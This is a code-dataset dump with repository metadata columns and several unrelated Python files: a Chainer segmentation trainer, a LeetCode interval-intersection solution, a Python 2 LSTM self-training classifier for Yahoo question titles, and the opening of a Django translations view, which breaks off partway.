blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ed9cdd0e4b2fcfc6edd795da9fa5d9edc907068a
|
ceea480538d17dede8973656d69df028f6e113c5
|
/trainer.py
|
297c3f48e1cac94e6c419ba7fea5be96f577ceab
|
[] |
no_license
|
yuki1125/semantic_seg
|
990287492317f193d5bc3619f23db9b290dc74e3
|
b034bdeb51a2b3ad365d3bf5b7c5604fed7a9d50
|
refs/heads/master
| 2020-04-13T03:40:05.798578
| 2018-12-24T01:53:52
| 2018-12-24T01:53:52
| 162,938,261
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,962
|
py
|
import argparse
import os
import chainer
import chainer.functions as F
import chainer.links as L
from chainer import iterators
from chainer import training
from chainer import optimizers
from chainer.training import extensions
from model import FCN
from model_2 import FCNN
from dataset import LabeledImageDataset
from mIOU import PixelwiseSigmoidClassifier
from unet import UNet
# Project root: the directory containing this file.
BASE_ROOT = os.path.join(os.path.dirname(os.path.abspath(__file__)))
# Windows-style dataset layout (escaped backslashes); each archive unpacks into
# a directory of the same name, hence the doubled path segment.
TEST_PATH = os.path.join(BASE_ROOT, 'data\\seg_test_images\\seg_test_images')
TRAIN_ANNO_PATH = os.path.join(BASE_ROOT, 'data\\seg_train_annotations\\seg_train_annotations')
TRAIN_PATH = os.path.join(BASE_ROOT, 'data\\seg_train_images\\seg_train_images')
def create_trainer():
    """Parse command-line arguments and assemble a chainer training.Trainer
    for the semantic-segmentation model.

    Returns:
        chainer.training.Trainer, ready for ``run()``.

    Raises:
        ValueError: if --tcrop or --vcrop is not divisible by 16.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('--dataset', default=BASE_ROOT,
                        help='Path to directory containing train.txt, val.txt')
    parser.add_argument('--images', default=TRAIN_PATH,
                        help='Root directory of input images')
    parser.add_argument('--labels', default=TRAIN_ANNO_PATH,
                        help='Root directory of label images')
    parser.add_argument('--batchsize', '-b', type=int, default=4,
                        help='Number of images in each mini-batch')
    parser.add_argument('--test-batchsize', '-B', type=int, default=4,
                        help='Number of images in each test mini-batch')
    parser.add_argument('--epoch', '-e', type=int, default=50,
                        help='Number of sweeps over the dataset to train')  # typo fix: "oever"
    parser.add_argument('--gpu', '-g', type=int, default=0,
                        help='GPU ID (negative value indicates CPU)')
    parser.add_argument('--frequency', '-f', type=int, default=1,
                        help='Frequency of taking a snapshot')
    parser.add_argument('--out', '-o', default='logs',
                        help='Directory to output the result under models directory')
    parser.add_argument('--resume', '-r', default='',
                        help='Resume the training from snapshot')
    parser.add_argument('--noplot', dest='plot', action='store_false',
                        help='Disable PlotReport extension')  # typo fix: "extention"
    parser.add_argument('--tcrop', type=int, default=256,
                        help='Crop size for train-set images')
    parser.add_argument('--vcrop', type=int, default=256,
                        help='Crop size for validation-set images')
    args = parser.parse_args()

    # Explicit validation instead of `assert`, which is stripped under `python -O`.
    if args.tcrop % 16 != 0 or args.vcrop % 16 != 0:
        raise ValueError("tcrop and vcrop must be divisible by 16.")

    print('GPU: {}'.format(args.gpu))
    print('# Minibatch-size: {}'.format(args.batchsize))
    print('# Crop-size: {}'.format(args.tcrop))
    print('# epoch: {}'.format(args.epoch))
    print('')

    # Output resolution follows --tcrop instead of a hard-coded 256
    # (identical behavior for the default crop size).
    model = FCNN(out_h=args.tcrop, out_w=args.tcrop)
    # Pixel-wise classifier wrapper: provides the loss/accuracy reported below.
    train_model = PixelwiseSigmoidClassifier(model)
    optimizer = optimizers.Adam()
    optimizer.setup(train_model)

    # Datasets. BUG FIX: validation now honours --vcrop (the original reused tcrop).
    train = LabeledImageDataset(os.path.join(args.dataset, "train.txt"), args.images, args.labels,
                                mean=0, crop_size=args.tcrop, test=True, distort=False)
    val = LabeledImageDataset(os.path.join(args.dataset, "val.txt"), args.images, args.labels,
                              mean=0, crop_size=args.vcrop, test=True, distort=False)

    train_iter = iterators.SerialIterator(train, args.batchsize)
    # BUG FIX: use --test-batchsize for validation (it was parsed but ignored).
    val_iter = iterators.SerialIterator(val, args.test_batchsize, repeat=False, shuffle=False)

    # The updater pulls mini-batches, runs the model, and updates parameters.
    updater = training.StandardUpdater(train_iter, optimizer, device=args.gpu)
    # BUG FIX: honour --out (it was parsed but ignored).
    trainer = training.trainer.Trainer(updater, (args.epoch, 'epoch'), out=args.out)

    logging_attributes = [
        'epoch', 'main/loss', 'main/accuracy', 'val/main/loss', 'val/main/accuracy']
    trainer.extend(extensions.LogReport(logging_attributes))
    # BUG FIX: snapshot every --frequency epochs (it was parsed but ignored).
    trainer.extend(extensions.snapshot(filename='snapshot_epoch-{.updater.epoch}'),
                   trigger=(max(1, args.frequency), 'epoch'))
    trainer.extend(extensions.PrintReport(logging_attributes))
    if args.plot:
        # BUG FIX: honour --noplot (the flag was parsed but ignored).
        trainer.extend(extensions.PlotReport(['main/loss', 'val/main/loss']))
        trainer.extend(extensions.PlotReport(['main/accuracy', 'val/main/accuracy'],
                                             'epoch', file_name='accuracy.png'))
    trainer.extend(extensions.Evaluator(val_iter, optimizer.target, device=args.gpu), name='val')

    # BUG FIX: honour --resume (it was parsed but ignored).
    if args.resume:
        chainer.serializers.load_npz(args.resume, trainer)

    return trainer
if __name__ == '__main__':
    # Build and run the trainer only when executed as a script, so importing
    # this module (e.g. for testing) does not start a training run.
    trainer = create_trainer()
    trainer.run()
|
[
"noreply@github.com"
] |
noreply@github.com
|
8e789d064478ca11b9395388fe2afcf549fdeb58
|
d70e3c5a374e4a644ac959afd1d5bccfb7959580
|
/May Leetcode Challenge/23_Interval_list_Intersection.py
|
66ef34cb508227e31756b38335ddd783e9e3efa5
|
[] |
no_license
|
vidhlakh/LeetcodeProjects
|
17bbc9f1ad927478a3acdbc1bd1c78488ba62ad1
|
d6bdfa55832980aa80bda818ae657df74aa3cd3b
|
refs/heads/master
| 2022-09-20T11:15:39.539572
| 2020-06-01T01:13:24
| 2020-06-01T01:13:24
| 262,650,650
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 764
|
py
|
class Solution:
    def intervalIntersection(self, A, B):
        """Return the pairwise intersections of two sorted lists of closed intervals.

        A and B are each lists of [start, end] pairs, sorted and disjoint.
        The result preserves order and may contain degenerate [x, x] intervals.
        """
        result = []
        a_idx, b_idx = 0, 0
        while a_idx < len(A) and b_idx < len(B):
            # Overlap starts at the later start and ends at the earlier end.
            lo = max(A[a_idx][0], B[b_idx][0])
            hi = min(A[a_idx][1], B[b_idx][1])
            if lo <= hi:
                result.append([lo, hi])
            # Advance whichever interval finishes first; the other may still
            # intersect the next interval of the advanced list.
            if A[a_idx][1] < B[b_idx][1]:
                a_idx += 1
            else:
                b_idx += 1
        return result
if __name__ == '__main__':
    # Demo run (LeetCode example); guard keeps the print from firing on import.
    s = Solution()
    print(s.intervalIntersection([[0,2],[5,10],[13,23],[24,25]],[[1,5],[8,12],[15,24],[25,26]]))
|
[
"vidhlakh@gmail.com"
] |
vidhlakh@gmail.com
|
dae74131879866f3ed080dc1e0c3311a09c4273a
|
06298b10b0b2860a94b7234cae30eeed422f21bc
|
/Snowball.py
|
5d790dfe5b3a3b9cc16e3d3697b3754f1652c1c0
|
[] |
no_license
|
vicmak/Sequence-classification
|
974d0848043362b4367ec7e374acceb31f8e0861
|
6b106a8689fd14284aa67c0674d39d01113dc405
|
refs/heads/master
| 2021-01-20T13:41:34.009623
| 2018-12-05T12:29:20
| 2018-12-05T12:29:20
| 90,512,819
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,203
|
py
|
import numpy as np
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.layers import Activation
from keras.layers.embeddings import Embedding
from keras.preprocessing import sequence
from collections import Counter, defaultdict
from itertools import count
import nltk
import mmap
import itertools
from sklearn import model_selection
import copy
from sklearn.metrics import roc_auc_score
from sklearn.metrics import recall_score
from keras.layers import Dropout
# Global accumulator of question ids, appended to by FastCorpusReaderYahoo.__iter__.
q_ids = []
# How many unlabeled rows to read from the 20M-title corpus per pass.
UNLABELED_INSTANCES_NUMBER = 1000
def is_common(common_list, word):
    """Return True if `word` is the first element of any pair in `common_list`."""
    return any(pair[0] == word for pair in common_list)
class Vocab: # Storing the vocabulary and word-2-id mappings
    # NOTE(review): Python 2 only -- relies on `count(0).next` and
    # `dict.iteritems`, neither of which exists on Python 3.
    def __init__(self, w2i=None):
        # Default: a defaultdict that hands out consecutive ids on first lookup.
        if w2i is None: w2i = defaultdict(count(0).next)
        self.w2i = dict(w2i)
        # Inverse mapping, id -> word.
        self.i2w = {i: w for w, i in w2i.iteritems()}
    @classmethod
    def from_corpus(cls, corpus):
        # Alternate constructor: assign ids to words in order of first appearance.
        w2i = defaultdict(count(0).next)
        for sent in corpus:
            # The list comprehension is used only for its lookup side effect.
            [w2i[word] for word in sent]
        return Vocab(w2i)
    def size(self): return len(self.w2i.keys())
# Path to the reduced vocabulary file, one word per line (Windows layout).
vocab_filename = "C:\\corpora\\yahoo\\titles20M\\small_vocab.txt"
def read_vocab_from_list(filename):
    """Read one word per line from `filename`; map each word to its 0-based line index."""
    w2i = dict()
    with open(filename) as dict_file:
        for index, line in enumerate(dict_file):
            w2i[line.strip()] = index
    return w2i
# Module-level side effect: the vocabulary is loaded once at import time and
# shared by every reader below (Python 2 print statement).
vocab_dictionary = read_vocab_from_list(vocab_filename)
main_vocab = Vocab(vocab_dictionary)
print "Vocab size", main_vocab.size()
def ExtractAlphanumeric(ins):
    """Drop every character that is not an ASCII letter, digit, whitespace
    or punctuation character; return the filtered string."""
    from string import ascii_letters, digits, whitespace, punctuation
    allowed = set(ascii_letters + digits + whitespace + punctuation)
    return "".join(ch for ch in ins if ch in allowed)
def get_padded_sentences_tokens_list(text):
    """Tokenize `text` into words with nltk, wrapping every sentence's tokens
    between <sentence-start> and <sentence-stop> markers."""
    tokens = []
    for sent in nltk.sent_tokenize(text):
        tokens.append("<sentence-start>")
        tokens.extend(nltk.word_tokenize(sent))
        tokens.append("<sentence-stop>")
    return tokens
def get_int_sentences(sentences, vocab):
    """Map each sentence (list of tokens) to a list of ids via vocab.w2i.

    Raises KeyError for out-of-vocabulary tokens, like the original lookup.
    """
    return [[vocab.w2i[w] for w in sentence] for sentence in sentences]
class UnlabeledFastCorpusReader:
    """Iterate the first UNLABELED_INSTANCES_NUMBER rows of a TSV file,
    yielding the tokenized title found in column 8 of each row."""
    def __init__(self, fname):
        self.fname = fname
    def __iter__(self):
        with open(self.fname) as unlabeled_file:
            for i in range(0, UNLABELED_INSTANCES_NUMBER):
                # next() builtin instead of the Python-2-only .next() method.
                current_line = next(unlabeled_file)
                line = current_line.strip()
                tokens = line.split("\t")
                line = tokens[8]
                # BUG FIX: get_tokenized_padded_line takes (line, vocab); the
                # original call omitted the vocabulary and raised TypeError.
                line = get_tokenized_padded_line(line, main_vocab)
                yield line
def get_tokenized_padded_line(string_line, vocab):
    """Lowercase and ASCII-filter a line, tokenize it with sentence markers,
    wrap the whole sequence in <start>/<stop>, and keep only in-vocabulary tokens."""
    text = ExtractAlphanumeric(string_line.lower())
    padded = ["<start>"] + get_padded_sentences_tokens_list(text) + ["<stop>"]
    return [token for token in padded if token in vocab.w2i.keys()]
class CompleteCorpusReader:
    # Iterates every row of a comma-separated corpus via mmap, yielding the
    # tokenized question text (all fields between the first field and the
    # trailing classification value).
    # NOTE(review): Python 2 only -- mmap yields byte strings that are split
    # and joined as text here.
    def __init__(self, fname):
        self.fname = fname
        # File handle is kept open for the object's lifetime; mmap'd in __iter__.
        self.f = open(fname, 'rb')
    def __iter__(self):
        # in Linux\Mac replace with m = mmap.mmap(self.f.fileno(), 0, prot=mmap.PROT_READ)
        m = mmap.mmap(self.f.fileno(), 0, access=mmap.ACCESS_READ)
        data = m.readline()
        while data:
            parts = data.split(",") # get the title of the question
            data = m.readline()
            end = len(parts)-1
            text_parts = parts[1: end] # Extract all title words, except for the classification value
            line = ",".join(text_parts)
            line = get_tokenized_padded_line(line, main_vocab)
            # Yield a list of tokens for this question
            yield line
unlabeled_titles_filename = "C:\\corpora\\yahoo\\titles20M\\question.tsv"
def iter_unlabeled_titles(filename=unlabeled_titles_filename):
    """Yield the tokenized title (TSV column 8) of the first
    UNLABELED_INSTANCES_NUMBER rows of `filename`.

    BUG FIX: this body originally sat at module level with a bare `yield`,
    which is a SyntaxError outside a function; it is now a proper generator
    (duplicating UnlabeledFastCorpusReader's behavior as the original intended).
    """
    with open(filename) as unlabeled_file:
        for i in range(0, UNLABELED_INSTANCES_NUMBER):
            # next() builtin instead of the Python-2-only .next() method.
            current_line = next(unlabeled_file)
            line = current_line.strip()
            tokens = line.split("\t")
            line = tokens[8]
            line = get_tokenized_padded_line(line, main_vocab)
            yield line
class FastCorpusReaderYahoo:
    # Iterates a comma-separated labeled corpus via mmap, yielding tokenized
    # question text. Side effect: appends each row's question id to the global
    # q_ids list, which the k-fold evaluation below indexes into.
    # NOTE(review): Python 2 only (byte-string mmap handled as text).
    def __init__(self, fname):
        self.fname = fname
        self.f = open(fname, 'rb')
    def __iter__(self):
        #in Linux\Mac replace with m = mmap.mmap(self.f.fileno(), 0, prot=mmap.PROT_READ)
        m = mmap.mmap(self.f.fileno(), 0, access=mmap.ACCESS_READ)
        data = m.readline()
        # Auxiliary corpora; only used by the commented-out enrichment below.
        description_file = "C:\\corpora\\yahoo\\descr.tsv"
        answers_file = "C:\\corpora\\yahoo\\answers.csv"
        best_answer_file = "C:\\corpora\\yahoo\\best_answers.csv"
        while data:
            parts = data.split(",") #get the title of the question
            qid = parts[0] # Extract the question-ID
            q_ids.append(qid) # Add the question-ID to list of all extracted Question-IDs
            # Read the description into string (TAB separated)
            description = "" # Init the description string
            answer = ""
            '''
            with file(description_file) as f:
                for l in f:
                    description_parts = l.split("\t")
                    if qid == description_parts[0]:
                        description += description_parts[1]
                        #print "added:", description
            #Read the answers into string (COMMA separated)
            with file(best_answer_file) as af:
                for l in af:
                    answer_parts = l.split(",")
                    if qid == answer_parts[0]:
                        answer += ",".join(answer_parts[1:])
            '''
            end = len(parts)-1
            text_parts = parts[1 : end] # Extract all title words, except for the classification value
            line = ",".join(text_parts)
            data = m.readline()
            # description/answer are empty strings while the block above stays disabled.
            line = line.lower() + description.lower() + answer.lower()
            line = get_tokenized_padded_line(line, main_vocab)
            # Yield a list of tokens for this question
            yield line
def read_next_lines(filename, from_line_number, to_line_number):
    """Tokenize the titles (TSV column 8, lowercased) of the rows in the
    half-open range [from_line_number, to_line_number) of `filename`."""
    with open(filename) as unlabeled_file:
        window = itertools.islice(unlabeled_file, from_line_number, to_line_number)
        return [get_tokenized_padded_line(row.split("\t")[8].lower(), main_vocab)
                for row in window]
def readY(fname):
    """Return the class label of every row of `fname`.

    Each label is the final character of the stripped, lowercased line,
    parsed as an int (the corpus stores the label as the last CSV field).

    Fix: uses open() in a with-block instead of the Python-2-only file()
    builtin, so the handle is closed deterministically and the function
    also runs on Python 3.
    """
    Ys = []
    with open(fname) as fh:
        for line in fh:
            line = line.lower()
            Ys.append(int(line.strip()[-1]))
    return Ys
def read_embeddings(embeddings_filename):
    """Load a GloVe-style embedding file (`word v1 v2 ...` per line).

    Returns a dict mapping word -> list of floats.

    Fix: uses open() in a with-block instead of the Python-2-only file()
    builtin, so the handle is closed and the function runs on Python 3.
    """
    embeddings = dict()
    with open(embeddings_filename) as f:
        for line in f:
            tokens = line.split(" ")
            word = tokens[0].strip()
            # float() tolerates the trailing newline on the last token.
            float_emb = [float(x) for x in tokens[1:]]
            embeddings[word] = float_emb
    return embeddings
def read_word2vec_embeddings(embeddings_filename):
    """Load a word2vec text file, skipping the first (header) line.

    Returns a dict mapping word -> list of floats.

    Fix: uses open() in a with-block instead of the Python-2-only file()
    builtin, and enumerate() instead of a hand-rolled counter.
    """
    embeddings = dict()
    with open(embeddings_filename) as f:
        for counter, line in enumerate(f):
            # Line 0 is the "<vocab_size> <dim>" header: skip it.
            if counter > 0:
                tokens = line.split(" ")
                word = tokens[0]
                float_emb = [float(x) for x in tokens[1:]]
                embeddings[word] = float_emb
    return embeddings
# --- Script body: load corpora, embeddings and labels (Python 2) ---
labeled_title_filename = "C:\\corpora\\yahoo\\TitleUnescaped.csv"
unlabeled_titles_filename = "C:\\corpora\\yahoo\\titles20M\\question.tsv"
print "Read labeled file..."
labeled_train = FastCorpusReaderYahoo(labeled_title_filename)
embeddings_filename = "C:\\corpora\\embeddings\\titles300d.txt"
print "reading word2vec embeddings"
embs = read_word2vec_embeddings(embeddings_filename)
print "Checking embeddings for THE", embs["the"]
embedding_vector_length = 300
print "computing embeddings"
# Build the embedding matrix row-by-row in vocabulary order; out-of-embedding
# words get a random uniform vector (also cached back into embs).
embedding_weights = np.zeros((main_vocab.size(), embedding_vector_length))
for word, index in main_vocab.w2i.items():
    if word in embs.keys():
        embedding_weights[index, :] = embs[word]
    else:
        sampl = np.random.uniform(low=-1.0, high=1.0, size=(embedding_vector_length,))
        embs[word] = sampl
        embedding_weights[index, :] = sampl
print "embedding sample", embedding_weights[0]
print "another embedding sample", embedding_weights[1]
print "Reading Ys"
Ys = readY(labeled_title_filename)
# Materializing the reader also fills the global q_ids as a side effect.
labeled_train = list(labeled_train)
print "Creating labeled i-sentences for training"
int_train = get_int_sentences(labeled_train, main_vocab)
unlabeled_batch_size = 1000
max_sent_length = 30
# Pseudo-labeled instances accumulated by the self-training loop below.
new_instances = []
new_Ys = []
# Keep pristine copies of the purely human-labeled data for evaluation.
original_instances = copy.deepcopy(int_train)
original_Ys = copy.deepcopy(Ys)
def get_ensemble_data(text_probs):
    """Join the baseline ensemble CSV with the text-model probabilities.

    `text_probs` is a list of [question_id, probability] pairs. For every CSV
    row whose question id appears in `text_probs`, emits a 3-feature instance
    [baseline_feature, text_probability, baseline_feature] and its class label.

    Returns (instances, classes).

    Fix: uses open() in a with-block instead of the Python-2-only file()
    builtin, so the handle is closed and the function runs on Python 3.
    """
    classes = []
    instances = []
    ensemble_filename = "C:\\corpora\\yahoo\\Ensemble_Data_baseline.csv"
    for_asert = 0
    # Tracks how often each qid matched (presumably for debugging/asserts).
    qid_counter = dict()
    with open(ensemble_filename) as f:
        for line in f:
            tokens = line.strip().split(",")
            qid = tokens[0]
            for [id, text_prob] in text_probs:
                if qid == id:
                    if qid in qid_counter.keys():
                        qid_counter[qid] += 1
                    else:
                        qid_counter[qid] = 1
                    instance = []
                    instance.append(float(tokens[1]))
                    instance.append(text_prob[0])
                    instance.append(float(tokens[3]))
                    instances.append(instance)
                    classes.append(int(tokens[4]))
                    for_asert += 1
    return instances, classes
# --- Self-training ("snowball") loop: 5 batches of unlabeled data ---
# Each pass trains an LSTM on the current labeled pool, predicts the next
# unlabeled batch, and adds confident predictions as pseudo-labels.
for i in range(0, 5):
    unlabeled_train = read_next_lines(unlabeled_titles_filename, i*unlabeled_batch_size, i*unlabeled_batch_size + unlabeled_batch_size)
    print "Creating unlabeled i-sentences for training, batch:", i
    int_unlabeled_train = get_int_sentences(unlabeled_train, main_vocab)
    print " Building the model....."
    # start label propagation
    model = Sequential()
    model.add(Embedding(main_vocab.size(), embedding_vector_length, input_length=max_sent_length, weights=[embedding_weights]))
    model.add(LSTM(200, recurrent_dropout=0.3))
    model.add(Dense(1, activation='sigmoid'))
    model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
    print "Padding the model"
    padded_train = sequence.pad_sequences(int_train, max_sent_length)
    print "fitting the model"
    model.fit(padded_train, Ys, epochs=4, batch_size=100)
    print "Padding test"
    padded_test = sequence.pad_sequences(int_unlabeled_train, max_sent_length)
    print "Predicting..."
    predictions = model.predict(padded_test)
    # Here add the best predictions to the labeled instances
    new_instances_num = 0
    # NOTE(review): the inner loop reuses the outer loop variable `i`; harmless
    # because the outer `for` rebinds it each iteration, but worth renaming.
    for i in range(0, len(predictions)):
        # Confidence thresholds 0.9 / 0.1 select pseudo-positive / pseudo-negative.
        if predictions[i] > 0.9:
            int_train.append(int_unlabeled_train[i])
            new_instances.append(int_unlabeled_train[i])
            Ys.append(1)
            new_Ys.append(1)
            new_instances_num += 1
        if predictions[i] < 0.1:
            int_train.append(int_unlabeled_train[i])
            new_instances.append(int_unlabeled_train[i])
            Ys.append(0)
            new_Ys.append(0)
            new_instances_num += 1
    print "Added new instances:", new_instances_num
# --- K-fold evaluation of the text model, then the 3-feature ensemble ---
print "STARTING K-FOLD, TEST"
recall_1_list = []
recall_0_list = []
auc = []
# Collects [qid, probability] pairs across folds for the ensemble join below.
accumulator_probs = []
kf = model_selection.KFold(n_splits=2)
# Folds are defined on the original (human-labeled) data; pseudo-labeled
# instances are added to the training side of every fold.
for train_idx, test_idx in kf.split(original_instances):
    X_train = [original_instances[i] for i in train_idx]
    Y_train = [original_Ys[i] for i in train_idx]
    X_train = X_train + new_instances
    Y_train = Y_train + new_Ys
    # NOTE(review): test folds index int_train/Ys, which equal the original
    # lists on these indices since pseudo-labels were only appended.
    X_test = [int_train[i] for i in test_idx]
    Y_test = [Ys[i] for i in test_idx]
    q_ids_test = [q_ids[i] for i in test_idx]
    X_train = sequence.pad_sequences(X_train, maxlen=max_sent_length)
    X_test = sequence.pad_sequences(X_test, maxlen=max_sent_length)
    model = Sequential()
    model.add(Embedding(main_vocab.size(), embedding_vector_length, input_length=max_sent_length, weights=[embedding_weights]))
    model.add(LSTM(200, recurrent_dropout=0.3))
    model.add(Dense(1, activation='sigmoid'))
    model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
    model.fit(X_train, Y_train, epochs=4, batch_size=100)
    predictions = model.predict(X_test)
    for i in range(0, len(q_ids_test)):
        accumulator_probs.append([q_ids_test[i], predictions[i]])
    auc.append(roc_auc_score(Y_test, predictions))
    # Threshold probabilities at 0.5 for the recall metrics.
    rounded = []
    for pred in predictions:
        if pred > 0.5:
            rounded.append(1)
        else:
            rounded.append(0)
    recall_0_list.append(recall_score(Y_test, rounded, pos_label=0))
    recall_1_list.append(recall_score(Y_test, rounded, pos_label=1))
    print "FINISHED FOLD - TRAIN TEXT"
print "STARTING ENSEMBLE"
instances, classes = get_ensemble_data(accumulator_probs)
ensemble_recall_1_list = []
ensemble_recall_0_list = []
ensemble_auc = []
kf = model_selection.KFold(n_splits=2)
for train_idx, test_idx in kf.split(instances):
    print "ENSEMBLE FOLD"
    X_train = np.array([instances[i] for i in train_idx])
    Y_train = np.array([classes[i] for i in train_idx])
    X_test = [instances[i] for i in test_idx]
    Y_test = [classes[i] for i in test_idx]
    # Tiny MLP over the three ensemble features.
    ensemble_model = Sequential()
    ensemble_model.add(Dense(units=3, activation="sigmoid", input_shape=(3,)))
    ensemble_model.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))
    ensemble_model.compile(loss="binary_crossentropy", optimizer="adam")
    ensemble_model.fit(X_train, Y_train, epochs=3)
    print"FITTED"
    predictions = ensemble_model.predict(X_test)
    # print predictions
    ensemble_auc.append(roc_auc_score(Y_test, predictions))
    rounded = []
    for pred in predictions:
        if pred > 0.5:
            rounded.append(1)
        else:
            rounded.append(0)
    ensemble_recall_0_list.append(recall_score(Y_test, rounded, pos_label=0))
    ensemble_recall_1_list.append(recall_score(Y_test, rounded, pos_label=1))
# Final report: mean recall per class and mean AUC across folds.
print "TEXT:"
print "RECALL 0:", sum(recall_0_list) / float(len(recall_0_list))
print "RECALL 1:", sum(recall_1_list) / float(len(recall_1_list))
print "AUC :", sum(auc) / float(len(auc))
print "ENSEMBLE"
print "RECALL 0:", sum(ensemble_recall_0_list) / float(len(ensemble_recall_0_list))
print "RECALL 1:", sum(ensemble_recall_1_list) / float(len(ensemble_recall_1_list))
print "AUC :", sum(ensemble_auc) / float(len(ensemble_auc))
'''
print len(int_train)
print len(Ys)
recall_1_list = []
recall_0_list = []
auc = []
accumulator_probs=[]
# fix random seed for reproducibility
np.random.seed(7)
kf = model_selection.KFold(n_splits=5)
for train_idx, test_idx in kf.split(int_train):
X_train = [int_train[i] for i in train_idx]
Y_train = [Ys[i] for i in train_idx]
X_test = [int_train[i] for i in test_idx]
Y_test = [Ys[i] for i in test_idx]
q_ids_test = [q_ids[i] for i in test_idx]
X_train = sequence.pad_sequences(X_train, maxlen=max_sent_length)
X_test = sequence.pad_sequences(X_test, maxlen=max_sent_length)
# create the model
model = Sequential()
model.add(Embedding(WORDS_NUM, embedding_vector_length, input_length=max_sent_length, weights=[embedding_weights]))
#model.add(Dropout(0.1))
model.add(LSTM(200, recurrent_dropout=0.3))
#model.add(Dropout(0.2))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
print "Fitting the model"
model.fit(X_train, Y_train, epochs=4, batch_size=100)
predictions = model.predict(X_test)
for i in range(0,len(q_ids_test)):
accumulator_probs.append([q_ids_test[i], predictions[i]])
auc.append(roc_auc_score(Y_test, predictions))
rounded = []
for pred in predictions:
if pred >0.5:
rounded.append(1)
else:
rounded.append(0)
recall_0_list.append(recall_score(Y_test, rounded, pos_label=0))
recall_1_list.append(recall_score(Y_test, rounded, pos_label=1))
print "FINISHED FOLD - TRAIN TEXT"
def get_ensemble_data(text_probs):
classes = []
instances = []
ensemble_filename = "C:\\corpora\\yahoo\\Ensemble_Data_baseline.csv"
#print "LENGTH text probs", len(text_probs)
for_asert = 0
qid_counter = dict()
with file(ensemble_filename) as f:
for line in f:
tokens = line.strip().split(",")
qid = tokens[0]
for [id, text_prob] in text_probs:
if qid == id:
if qid in qid_counter.keys():
qid_counter[qid] += 1
else:
qid_counter[qid] = 1
instance =[]
instance.append(float(tokens[1]))
instance.append(text_prob[0])
instance.append(float(tokens[3]))
instances.append(instance)
classes.append(int(tokens[4]))
for_asert +=1
return instances, classes
print "STARTING ENSEMBLE"
instances, classes = get_ensemble_data(accumulator_probs)
ensemble_recall_1_list = []
ensemble_recall_0_list = []
ensemble_auc = []
kf = model_selection.KFold(n_splits=5)
for train_idx, test_idx in kf.split(instances):
print "ENSEMBLE FOLD"
X_train = np.array([instances[i] for i in train_idx])
Y_train = np.array([classes[i] for i in train_idx])
X_test = [instances[i] for i in test_idx]
Y_test = [classes[i] for i in test_idx]
ensemble_model = Sequential()
ensemble_model.add(Dense(units=3, activation="sigmoid", input_shape=(3,)))
ensemble_model.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))
ensemble_model.compile(loss="binary_crossentropy", optimizer="adam")
ensemble_model.fit(X_train, Y_train, epochs=300)
print"FITTED"
predictions = ensemble_model.predict(X_test)
#print predictions
ensemble_auc.append(roc_auc_score(Y_test, predictions))
rounded = []
for pred in predictions:
if pred >0.5:
rounded.append(1)
else:
rounded.append(0)
ensemble_recall_0_list.append(recall_score(Y_test, rounded, pos_label=0))
ensemble_recall_1_list.append(recall_score(Y_test, rounded, pos_label=1))
print "TEXT:"
print "RECALL 0:", sum(recall_0_list) / float(len(recall_0_list))
print "RECALL 1:", sum(recall_1_list) / float(len(recall_1_list))
print "AUC :", sum(auc)/float(len(auc))
print "ENSEMBLE"
print "RECALL 0:", sum(ensemble_recall_0_list) / float(len(ensemble_recall_0_list))
print "RECALL 1:", sum(ensemble_recall_1_list) / float(len(ensemble_recall_1_list))
print "AUC :", sum(ensemble_auc)/float(len(ensemble_auc))
'''
|
[
"noreply@github.com"
] |
noreply@github.com
|
9ebffdc2c7a97a1fcd82205153e8ae6ff5acd96a
|
4dbdcdd777897567ede8343299b5dacf59580479
|
/translations/views.py
|
9cffdce4a4af841a082619776557b448ebeada5a
|
[
"BSD-3-Clause"
] |
permissive
|
OpenTTD-Ladder/yawd-translations
|
88cae158d561034ca6e69311fb8be9acc2b73627
|
913025f4361883408ca480a8e7c9ea90add0a9db
|
refs/heads/master
| 2021-01-15T20:12:59.548959
| 2013-07-19T09:06:07
| 2013-07-19T09:06:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,508
|
py
|
import os, shutil
from django.conf import settings
from django.contrib import messages
from django.core.exceptions import PermissionDenied
from django.core.management.commands.compilemessages import has_bom
from django.core.management.commands.makemessages import make_messages, handle_extensions
from django.http import Http404
from django.http import HttpResponseRedirect
from django.utils.encoding import smart_str
from django.utils.importlib import import_module
from django.utils.text import capfirst
from django.utils.translation import to_locale, ugettext as _
from django.views.generic import TemplateView, FormView
from forms import PoFileForm
from models import Language
from utils import compile_message_file, concat_message_files, reset_translations
class GenerateTranslationMessagesView(TemplateView):
    """AJAX view that (re)generates the unified .po message catalog for one
    language: collects per-app catalogs, runs makemessages, merges and
    compiles them under LOCALE_PATHS[0].

    Requires the `translations.edit_translations` permission; URL arg 0 is
    the language name.
    """
    template_name ='admin/includes/translation_messages_list.html'
    def get(self, request, *args, **kwargs):
        # AJAX-only endpoint.
        if not request.is_ajax():
            raise Http404
        if not request.user.has_perm('translations.edit_translations'):
